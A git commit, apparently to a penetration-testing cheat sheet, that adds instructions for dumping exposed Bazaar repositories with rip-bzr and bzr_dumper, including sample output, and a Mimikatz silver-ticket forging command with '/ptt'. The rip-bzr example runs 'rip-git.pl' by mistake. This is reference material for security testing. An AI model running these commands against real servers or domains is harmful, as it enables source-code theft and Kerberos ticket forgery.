Bazaar - version control system

vorband · Mar 15, 2019 · e5090f2 · e5090f2
1 parent 47490c1
commit e5090f2
Show file tree

Hide file tree

Showing 2 changed files with 38 additions and 0 deletions.
diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md
@@ -11,6 +11,9 @@
 - [SVN - Source code management](#svn---source-code-management)
   - [SVN example (Wordpress)](#svn-example-wordpress)
   - [Automatic way : svn-extractor](#automatic-way--svn-extractor)
+- [BAZAAR - Source code management](#bazaar---source-code-management)
+  - [Automatic way : rip-bzr](#automatic-way--rip-bzr)
+  - [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
 
 ## GIT - Source code management
 
@@ -189,6 +192,40 @@ git clone https://github.com/anantshri/svn-extractor.git
 python svn-extractor.py –url "url with .svn available"
 ```
 
+## BAZAAR - Source code management
+
+### Automatic way : rip-bzr.pl
+
+```powershell
+wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
+docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -v -u  
+```
+
+### Automatic way : bzr_dumper
+
+```powershell
+git clone https://github.com/SeahunOh/bzr_dumper
+python3 dumper.py -u "http://127.0.0.1:5000/" -o source
+Created a standalone tree (format: 2a)                                                                                                                                                       
+[!] Target : http://127.0.0.1:5000/
+[+] Start.
+[+] GET repository/pack-names
+[+] GET README
+[+] GET checkout/dirstate
+[+] GET checkout/views
+[+] GET branch/branch.conf
+[+] GET branch/format
+[+] GET branch/last-revision
+[+] GET branch/tag
+[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
+[*] Finish
+
+$ bzr revert
+ N  application.py
+ N  database.py
+ N  static/   
+```
+
 ## References
 
 - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
@@ -343,6 +343,7 @@ Forging a TGS require machine accound password (key) from the KDC
 ```powershell
 Create a ticket for the service
 kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
+/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
 
 Then use the same steps as a Golden ticket
 misc::convert ccache ticket.kirbi